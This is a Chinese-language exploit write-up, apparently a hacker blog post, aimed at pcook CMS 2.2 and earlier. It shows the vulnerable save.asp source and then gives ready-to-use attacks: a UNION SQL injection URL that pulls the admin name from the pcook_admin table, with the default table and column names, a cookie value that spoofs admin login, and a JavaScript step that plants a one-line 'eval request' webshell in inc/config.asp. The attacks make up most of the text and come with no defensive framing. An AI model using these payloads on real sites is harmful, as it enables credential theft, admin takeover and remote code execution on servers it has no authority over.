程序:pcook cms 2.2以及以下版本
下载:http://down.chinaz.com/soft/23761.htm
漏洞文件:save.asp,hits.asp
BY 流浪的风
save.asp代码:
<!--#include file="Inc/conn.asp"-->
<%
Dim id
Dim Rs,Sql
id = Replace(Trim(Request.QueryString("id")),"'","")
If Session("id"&id)<>"" Then
Set Rs = Server.CreateObject("ADODB.Recordset")
Sql = "Select * From pcook_Article Where id="&id
Rs.Open Sql,Conn,3,3
If Rs.Eof And Rs.Bof Then
Response.Write("NoData")
Else
Response.Write("Dig")
Response.Write(",")
Response.Write(Rs("Dig"))
End If
Else
Set Rs = Server.CreateObject("ADODB.Recordset")
Sql = "Select * From pcook_Article Where id="&id
Rs.Open Sql,Conn,3,3
If Rs.Eof And Rs.Bof Then
Response.Write("NoData")
Else
Dim Dig
Dig =Rs("Dig")
Dig = Dig + 1
Rs("Dig") = Dig
Rs.Update
Rs.Close
Set Rs = Nothing
Session("id"&id) = id
Response.Write(Dig)
End If
End If
%>
过滤不全,直接可以利用
随便找篇文章,链接如list.asp?id=1341,把list.asp改为save.asp就可以了
save.asp?id=1341%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin_name,16,17,18,19,20,21%20from%20pcook_admin
有的也许是19个字段,刚刚就有遇到过
默认表名 pcook_admin
默认字段表admin_name,admin_pass
关键字我就找不出来了,谁找出来,给我留下言啊
忘了补充一点,注入的时候,要把IE的安全属性调到最高,以免JS控制跳转首页了
来我blog :http://www.st999.cn/blog
=========
后台cookie欺骗
pcookmanage=UserName=admin
==============
一句话插配置文件 (Fung提供)
来到admin_setting.asp页面 输入以下代码 然后连接inc/config.asp文件即可
javascript:document.getElementById("artlistnum").value="1\":eval request(\"a\")'";alert(document.getElementById("artlistnum").value);
======
文章列表每页显示记录: 1":eval request("a")'
